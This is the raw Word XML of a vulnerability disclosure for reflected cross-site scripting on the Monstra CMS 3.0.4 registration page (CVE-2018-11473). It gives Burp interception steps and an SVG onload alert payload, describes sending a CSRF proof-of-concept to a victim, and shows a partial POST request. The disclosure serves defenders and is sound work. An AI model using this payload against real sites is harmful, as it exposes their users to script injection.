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1E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="51"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="51"/>
          <w:szCs w:val="51"/>
        </w:rPr>
        <w:t>Monstra CMS 3.0.4</w:t>
      </w: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b/>
          <w:bCs/>
          <w:sz w:val="51"/>
          <w:szCs w:val="51"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00F33948">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="51"/>
          <w:szCs w:val="51"/>
        </w:rPr>
        <w:t xml:space="preserve"> On Registration Page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Assigned CVE Number:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRPr="00905339" w:rsidRDefault="00F33948" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2018-11473</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7"/>
    <w:p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color w:val="00B0F0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Proof-of-Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C669B" w:rsidRDefault="009C669B"/>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7"/>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7"/>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7"/>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7"/>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7"/>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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Submitted by:</w:t>
      </w:r>
    </w:p>
    <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Nikhil Sahoo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRPr="00083024" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1"/>
      <w:r w:rsidRPr="00083024">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00905339">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>https://www.linkedin.com/in/nikhil-sahoo-87204b106/</w:t>
      </w:r>
    </w:p>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56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Proof-of-Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="276"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Hello,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="294" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRPr="00067D5D" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>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I would like to report a vulnerability that I discovered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Monstra CMS 3.0.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, which can be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploited to perform Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross-Site Scripting (XSS) attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="295" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="229" w:lineRule="auto"/>
        <w:ind w:right="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rP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sidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="299" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rP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rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="254"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Vulnerability Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="1"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Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="225"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Vendor of Product:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="1"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19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Monstra CMS 3.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="225"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Affected Component:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="294" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00F33948" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="225" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F33948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://localhost/monstra/users/registration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E631E7">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1375" w:right="1560" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720" w:equalWidth="0">
            <w:col w:w="9240"/>
          </w:cols>
          <w:noEndnote/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="page3"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRPr="00067D5D" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attack Type:</w:t>
      </w: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Remote</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Attack Vectors:</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39" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00F33948" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1)While registering..enter your details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2)turn up the intercept in burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3)Capture the request and change any field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(endpoint)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> in post request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">to a malicious </w:t>
      </w:r>
      <w:r>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code:-  "&gt;&lt;svg/onload=alert(1337)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4)Make a csrf poc of that send it to the victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5)The victim will ultimately recieve a pop up</w:t>
      </w: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F33948" w:rsidP="00E631E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POST REQUEST:-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290E13" w:rsidRDefault="00290E13" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F33948" w:rsidRDefault="00F33948" w:rsidP="00F3394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POST /monstra/users/registration HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Referer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>http://localhost/monstra/users/registration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;q=0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept-Language: en-us,en;q=0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Cookie: PHPSESSID=xxxx; login_attempts=i%3A5%3B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Length: 142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
